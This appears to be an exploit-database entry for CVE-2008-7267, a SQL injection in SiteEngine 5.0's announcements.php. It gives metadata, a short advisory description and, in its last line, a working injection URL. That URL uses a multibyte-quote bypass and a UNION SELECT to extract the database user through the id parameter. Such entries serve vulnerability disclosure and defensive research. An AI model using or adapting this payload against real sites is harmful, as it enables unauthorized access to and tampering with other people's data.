[] NeoSense

UC Gateway Investment SiteEngine 5.0 - 'announcements.php' SQL Injection

Author: xuanmumu
type: webapps
platform: php
port: 
date_added: 2008-10-23 
date_updated: 2014-03-26 
verified: 1 
codes: CVE-2008-7267;OSVDB-50039 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/31889/info

SiteEngine is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

SiteEngine 5.0 is vulnerable; other versions may also be affected.

http://www.example.com/announcements.php?id=1%bf%27%20and%201=2%20%20UNION%20select%201,2,user(),4,5,6,7,8,9,10,11%20/*